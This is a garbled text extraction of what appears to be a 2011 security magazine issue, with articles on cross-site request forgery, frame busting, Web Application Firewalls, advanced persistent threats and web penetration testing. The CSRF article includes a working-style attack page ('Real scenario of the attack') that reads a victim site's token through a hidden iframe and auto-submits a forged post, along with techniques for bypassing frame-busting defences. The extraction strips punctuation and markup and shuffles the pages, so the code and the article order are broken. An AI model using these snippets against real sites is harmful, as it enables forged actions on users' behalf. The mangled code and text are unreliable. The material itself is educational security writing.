ltinput type=text name=messagegt
ltinput type=submit value=Postgt
ltinput type=hidden name=token value=ltphp echo $tokengtgt
ltformgt
ltbodygt
lthtmlgt
Listing 3 Correct token
ltphp
session_start()
if($_SESSION[token] == $_POST[token])
$message = $_POST[message]
echo ltbgtMessageltbgtltbrgt$message
$file = fopen(messagestxta)
fwrite($file$messagern)
fclose($file)
else
echo Bad request
gt
WEB APP VULNERABILITIES
Page 36 httppentestmagcom012011 (1) November
And common counter-action statements are these
toplocation = selflocation
toplocationhref = documentlocationhref
toplocationreplace(selflocation)
toplocationhref = windowlocationhref
toplocationreplace(documentlocation)
toplocationhref = windowlocationhref
toplocationhref = bdquoURLrdquo
documentwrite(lsquorsquo)
toplocationreplace(documentlocation)
toplocationreplace(lsquoURLrsquo)
toplocationreplace(windowlocationhref)
toplocationhref = locationhref
selfparentlocation = documentlocation
parentlocationhref = selfdocumentlocation
Different FrameKillers are used by web developers and different techniques are used to bypass them
Method 1
ltscriptgt
windowonbeforeunload=function()
return bdquoDo you want to leave this pagerdquo
ltscriptgt
ltiframe src=rdquohttpwwwgoodcomrdquogtltiframegt
Method 2Using Double framing
ltiframe src=rdquosecondhtmlrdquogtltiframegt
secondhtml
ltiframe src=rdquohttpwwwsitecomrdquogtltiframegt
Best PracticesAnd the best example of FrameKiller is the following
ltstylegt html display none ltstylegt
ltscriptgt
if( self == top ) documentdocumentElementstyledispla
y=rsquoblockrsquo
else toplocation = selflocation
ltscriptgt
Which protects web application even if an attacker browses the webpage with javascript disabled option in the browser
SAMVEL GEVORGYANFounder amp Managing Director CYBER GATESwwwcybergatesam | samvelgevorgyancybergatesamSamvel Gevorgyan is Founder and Managing Director of CYBER GATES Information Security Consulting Testing and Research Company and has over 5 years of experience working in the IT industry He started his career as a web designer in 2006 Then he seriously began learning web programming and web security concepts which allowed him to gain more knowledge in web design web programming techniques and information security All this experience contributed to Samvelrsquos work ethics for he started to pay attention to each line of the code for good optimization and protection from different kinds of malicious attacks such as XSS(Cross-Site Scripting) SQL Injection CSRF(Cross-Site Request Forgery) etc Thus Samvel has transformed his job to a higher level and he is gradually becoming more complete security professional
Referencesbull Cross-Site Request Forgery ndash httpwwwowasporg
indexphpCross-Site_Request_Forgery_28CSRF29 httpprojectswebappsecorgwpage13246919Cross-Site-Request-Forgery
bull Same Origin Policybull FrameKiller(Frame Busting) ndash httpenwikipediaorgwiki
Framekiller httpseclabstanfordeduwebsecframebustingframebustpdf
Listing 4 Real scenario of the attack
lthtmlgt
ltheadgt
lttitlegtBADCOMlttitlegt
function submitForm()
var token = windowframes[0]documentforms[message
Form]elements[token]value
var myForm = documentmyForm
myFormtokenvalue = token
myFormsubmit()
ltscriptgt
ltheadgt
ltbody onLoad=submitForm()gt
ltdiv style=displaynonegt
ltiframe src=httpgoodcomindexphpgtltiframegt
ltform name=myForm target=hidden action=http
goodcompostphp method=POSTgt
ltinput type=text name=message value=I like wwwbadcom gt
ltinput type=hidden name=token value= gt
ltinput type=submit value=Postgt
ltformgt
ltdivgt
ltbodygt
lthtmlgt
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
ADVANCED PERSISTENT THREATS
Page 6 httppentestmagcom012011 (1) November Page 7 httppentestmagcom012011 (1) November
The use of HTTP may be required because different areas are often filtered out leaving only necessary protocols to emerge HTTP is often left open to allow administrators to navigate through these machines or to update them
To remain as stealthy as possible a strategic backdoor to the Web application or the application server will use HTTP as a direct connection and or as a tunnel to other applications During the movement it will not be filtered and no attention will be drawn to a process that opens a port unknown to the system
Bounce MechanismsWhenever changes occur witin an IT system the steps involving initial intrusion and continued presence are repeated as many times as necessary until it the goal is attained and sensitive data becomes accessibleHTTP once again comes into play during these stages of development because it is predominantly active and open between the different areas
bull Dialogue between server applicationsbull Web Servicesbull Web Administration Interfacebull Etc
It often happens that security policies contain the same weaknesses from one area to another
bull Exit ports openedbull Filtering omission on higher level portsbull Use of the same default passwords
Data ExtractionOnce crucial information is reached it is necessary to quit the system as discreetly as possible and over a certain length of time HTTP protocol is often enabled for exit without being monitored for several reasons
bull Machines are often updated using HTTP bull When an administrator logs on to a remote
machine he will often require access to a website bull Since these areas are often regarded as bdquosaferdquo
zones restrictions are lower and controls less strict
What Protective Measures Can Be DeployedApplication security has become major issue in the business world Whereas network security is fairly conventional and primarily leans on the filtering of destinations sources IP and Ports in most cases application security is more complex and involves applications that are often unique bespoke and
Anatomy of an APTAdvanced Persistent Threats are attacks calculated for latent effect and vested with a specific purpose that of retrieving sensitive or critical data
Several steps are necessary to reach the goal
bull The initial intrusionbull Continued presence within the IT systembull Bounce mechanism and in depth infiltrationbull Data extraction
HTTP plays an important role during the attacks firstly because it is predominantly present during the various stages and furthermore because it is often the only available protocol that can serve as an attack vector
The Initial IntrusionThe system is invaded by an attack focused on an area exposed to the public on the Internet In the case of Sony Playstation Network for instance the intrusion took place via their blog that used a vulnerable version of WordPress
These days it is unusual for any organization to do without a website and the latter can range from basic and simple to complex and dynamic
The website plays the role of a gateway that provides the initial point of entry into an infrastructure It becomes an outpost that enables important information to be gathered in order to successfully carry out the rest of the attack In addition depending on the application infrastructure location and lack of compartmentalization it is possible for a simple scarcely-used application to be found near or on the same server as a business application The attack will bounce from the one to the other and the business application which will then become accessible and provide more access privileges
Retrieval of information is often the vital issue during the bounce mechanism and and extended infiltration intothe system Some examples of the data targeted
bull User Passwords bull Hardware and network destinations -gt discoverybull Connectors to other systems -gt new protocolsbull Etc
Continued presenceAfter the initial inroads into the structure the next phase requires that presence within the system remains secure The machine has to be re-accessed and exploited without arousing the suspicions of system administrators
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
deployed with many more specifications relating to infrastructureThree steps are necessary to prevent or respond properly to an APT
bull Preventionbull Responsebull Forensics
PreventionIdeally security should be addressed at the very beginning when software and even the application infrastructure are still at the conception stage It is necessary to follow certain rules which will condition the response to different threats
Define a Secure Application InfrastructurePartition the NetworkThis measure is one of the pillars of the PCI-DSS and for good reason Keeping sections separate can limit the impact of an intrusion making it more difficult to obtainsatisfaction because of the large number of bounces required to attain sensitive data Each zone also deploys a security policy adapted to its content whether the flow is inbound or outbound
Moreover partitioning allows for easier forensic analysis in case of a compromise It is easier to understand the steps and measure the impact and the depth of the attack when one is able to analyze each area separately Unfortunately there are many systems described as flat infrastructures that contain a variety of applications housed in the same area After an incident has occurred it is difficult to determine precisely which applications have been compromised and what data has been hijacked
Separation of ApplicationsApplications can be separated using criteria such as data categorization or the level of risk attached to the application Clustering provides numerous advantages
bull It promotes rationalization in the design of security policies which are more or less complex depending on the type of data and the structure of the application to secure
bull It enhances understanding of an attack and by doing so facilitates the search for evidence which will then be based on the criticality of data and complexity of applications
Anticipate Possible OutcomesTo better understand the scope of an attack it is necessary to anticipate the options available to a
hacker once an application has been compromised Once this is done it is necessary to anticipate the procedures required to analyze verify and understand the attack We should bear in mind that an area of the infrastructure in which it is impossible to install a monitoring tool will be very complex to analyze during an incident In such a case it is necessary to predefine the tools and procedures for investigations and or monitoring
Risk analysis and attack guidelinesThis step allows a precise understanding of risks based on the data manipulated by applications
It has to be carried out by studying web applications their operation and business logic
Once each data component has been identified it is possible to draw up a list of rules and regulations that need to be followed by the application infrastructure
Developer TrainingApplications are commonly developed following specific business imperatives and often with the added stress of meeting availability deadlines Developers do not place security high up on their list of priorities and it is often overlooked in the process
However there are several ways to significantly reduce risk
bull Raising developer awareness of application attacksbull OWASP TOP10bull WASC TC v2
bull The use of libraries to filter inputbull Libraries are available for all languages
bull Setting up audit functions logs and traceabilitybull Accurate analysis of how the application works
Regular Auditing Code analysisYou can resort to manual code analysis by an auditor or to automated analysis by using the tools available to find vulnerabilities in the source code of web applications These tools often require complex configuration This step is useful to detect vulnerabilities before going into production and thus to fix them before they are exploited
Unfortunately the practice is only possible if you have access to the source code of the application Closed source software packages cannot be analyzed
Scanning and penetration testingAll applications can be scanned and pentested They also require configuration and or a thorough analysis of the application to determine the credentials necessary
ADVANCED PERSISTENT THREATS
Page 8 httppentestmagcom012011 (1) November Page 9 httppentestmagcom012011 (1) November
for navigation or resources to be avoided because of their capacity to cause significant damage (eg links enabling the deletion of entries in the database)
These tests have to be reproduced as often as possible and whenever a change in the application is put in place by developers
Appropriate ResponseTraditional firewalls do not filter network application protocols at best the so-called next-generation model can recognize a type of protocol and filter content in the manner of an IPS by recognizing attack patterns This response is clearly inadequate
Each zone containing web applications has to be filtered on incoming and outgoing content and on the use of the protocol itself
This type of deployment is often called deep defense and has the ability to monitor the various attacks at both the application and network levels
Last but not least the association of the identity context with security policy allows better detection of anomalies
Traffic Filtering The WAF (Web Application Firewall)Web application firewalls can be considered as an extension of application network firewalls They are able to analyze HTTP and the content it conveys The device is strongly recommended by section 66 of PCI-DSS
Often used in reverse proxy mode it allows for a break in protocol and facilitates the restructuring of areas between applications
The WAFEC document (Web Application Firewall Evaluation Criteria) published by WASC is a useful guideline that helps to understand and evaluate different vendors as needed
The WAF also helps to monitor and alert in case of threat in order to trigger a rapid response (eg blocking the IP of the attacker via a dialogue protocol with network firewalls)
Traffic Filtering The WSF (Web Services Firewall)It represents an extension of the WAF on the protocols carrying XML traffic over HTTP such as SOAP or REST
XML and its standards make security management easier in the sense that the operation of the service is described by documents generated directly by the development framework (eg WSDL Schemas)
Web services are vulnerable to the same attacks as web applications they consequently need the same
kind of protection Their position in the application infrastructure however is much more critical They are often located at the heart of sensitive information zones and connected directly via private links to partner infrastructures
The WSF provides security on the message format and content but also on the use of a service The use or production of a web service entails contract between two parties on the type of use (eg number of messages per day data type etc) The WSF will also serve to monitor this function and to ensure respect of SLA between the two parties
Authentication AuthorizationApplications use identities to control access to various resources and functions
The association of the identity context and security increases efficiency in the detection of anomalies For example a whitelist adapted according to the type of user can verify access to information based on user role
Ensuring Continuity of ServiceApplication security is primarily related to the exploitation of vulnerabilities in order to divert normal use for malicious purposes
However some attacks based on weaknesses can be devastating in effect perpetrated to make the application unavailable and thereby provoke losses due to activity downtime
To retaliate it is necessary to establish protective measures that block denial of service and automated processes and to ensure load balancing and SSL acceleration
OperationMonitoringIt is important to understand the use of the application during production to monitor and detect abnormal behavior and make decisions accordingly
bull Blacklistbull Legal Actionbull Redirection to a honeypot
Log CorrelationUnderstanding abnormal behavior in an application helps in locating an attack
An application infrastructure can comprise hundreds of applications
To understand the attack as a whole and monitor changes (discovery aggression compromise) it is necessary to have holistic view
ADVANCED PERSISTENT THREATS
Page 10 httppentestmagcom012011 (1) November
To do this it is imperative to confront and correlate logs correlation to obtain real-time overall analysis and understand the threat mechanics
bull Mass Attack on a type of applicationbull Attack targeting a specific applicationbull Attacks focused on a type of data
Reporting and AlertingThe dialogue between application network and security teams is often complex within an organization Formalized reports on attacks and the use of the application provide a basis for work and an understanding of application threats for these teams
Alerts will enable them to react and trigger procedures either at the network level by blocking the IP of the attacker or at the application level by forbidding access to resources areas or more directly by referral to a honeypot in view of analyzing the behavior of the attacker
ForensicsUnderstanding the scope of an attackFor each area compromised it is important to understand what elements have been impacted and to trace the attack to the roots of the intrusion and compromise by the installation of a backdoor bounce mechanisms to other areas and or extraction of data
Analysis of application componentsTo understand how the intrusion occurred it is
important to look for abnormal uses One example could be the presence of anomalous data in a variable a cookie To drill down to this level the logs of the various application components turn out to be very useful
bull Web server or applicationbull Databasebull Directorybull Etc
Systems AnalysisTo understand how the attacker remained in the area it is important to identify the type of backdoor used From the simplest act such as the placing an executable file in the application itself to the injection of code into a process (eg hook network functions) it is necessary to analyze the system hosting the application
bull Changed configuration filesbull Users addedbull Security rules changed
bull Errors of execution or increase in privileges
bull Unknown daemons or unusual groups and users bull Etc
Analysis of network equipmentDuring the various bounces within the application infrastructure the discovery and exploration of new possibilities leaves fingerprints Network firewalls keep precious logs with traces of these attempts In addition if access is logged it is important to check if there are connections to web applications at unusual times
The End justifies the MeansIn conclusion we can see that the means used to achieve an APT are often substantial and proportional to the criticality of targeted data APT are not just temporary attacks but real and constant threats with latent effect that need to fought in the long run
The security of an application infrastructure begins with the conception process and requires basic rules to be respected to simply security operations
Real-life experience of application management highlights difficulties in implementing all the good practices
A comprehensive study of threats appropriate response and anticipation of possible incidents are now the recommended procedure in dealing with application attacks
MATTHIEU ESTRADEMatthieu Estrade has 14 years experience in internet security In 2001 Matthieu designed a pioneering application rewall based on Web Reverse Proxy Technology for the company Axiliance As a well known specialist in his eld he soon became a member of the Open Source Apache HTTP server development team His security expertise has been put to contribution in WASC (Web Application Security Consortium) projects like WAFEC and WASSEC Matthieu is also a member of the French OWASP chapter Matthieu is currently CTO at BeeWare
a d v e r t i s e m e n t
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP ASPNet PHP Ajax JSP Perl Cold Fusion Flash and etc
These applications expose financial data customer information and other sensitive and confidential data that required authentication and authorization Ensuring that the web applications are secure is a critical mission that businesses have to go through to achieve the desired security level of such applications With the accessibility of such critical data to the public domain web application security testing also becomes paramount process for all the web applications that are exposed to the outside world
IntroductionPenetration testing (It is also called Pen Testing) is usually conducted by ethical hackers where the security team reviews application security vulnerabilities to discover potential security risks Such process requires a deep knowledge experience in a variety of different tools and a range of exploits that can achieve the required tasks
During the pen testing different web applicationsrsquo vulnerabilities are tested (eg Input Validation Buffer Overflow Cross Site Scripting URL Manipulation SQL Injection Cookie Modification Bypassing Authentication and Code Execution) A typical pen testing involves the following procedures
bull Identification of Ports ndash In this process ports are scanned and the associated services running are identified
bull Software Services Analyzed ndash In this process both automated and manual testing is conducted to discover weaknesses
bull Verification of Vulnerabilities ndash This process helps verify that the vulnerabilities are real where weakness might be exploited to help remediate the issues
bull Remediation of Vulnerabilities ndash In this process the vulnerabilities will be resolved and such vulnerabilities will be re-tested to ensure they have been addressed
Part of the initiative of securing the web applications is to include the security development lifecycle as part of the software development lifecycle where the number of security-related design and coding defects can be reduced and also the severity of any defects that do remain undetected can be reduced or eliminated Despite the fact that the above initiatives solve some of the security problems some of undiscovered defects will remain even in the most scrutinized web applications Until scanners can harness true artificial intelligence and put the anomalies into context or make normative judgments about them the struggle to find certain vulnerabilities will exist
WebApplication Security and Penetration Testing
In the recent years web applications have grown dramatically within many organizations and businesses where such entities became very independent on such technology as part of their businessesrsquo lifecycle
Automated Scanning vs Manual Penetration TestingA vulnerabilities assessment simply identifies and reports vulnerabilities whereas a pen testing attempts to exploit vulnerabilities to determine whether unauthorized access to other malicious activities is possible By performing a pen testing to simulate an attack itrsquos possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration hardware or software flaws or weaknesses in the perimeter defences protecting the application
With more than 75 of the attacks occurring over the HTTPS protocols and more than 90 of web applications containing some type of security vulnerability it is essential that organizations implement strong measures to secure their web applications Most of these attacks occur on the front door of the organization where the entire online community has an access to these doors (ie port 80 and port 443) With the complexity and the tremendous amount of sensitive data exist within web applications consumers not only expect but also demand security for this information
That said securing a web application goes far beyond testing the application using automated systems and tools or by using manual processes The security implementation begins in the conceptual phase where the modeling of the security risk is introduced by the application and the countermeasures that are required to be implemented It is imperative that the web application security should be thought of as another quality vector of every application that has to be considered through every step of the application lifecycle
Discovering web application vulnerabilities can be performed through different processes
bull Automation process ndash where scanning tools or static analysis tools will be used
bull Manual process ndash where penetration testing or code review will be used
Web application vulnerability types can be grouped into two categories
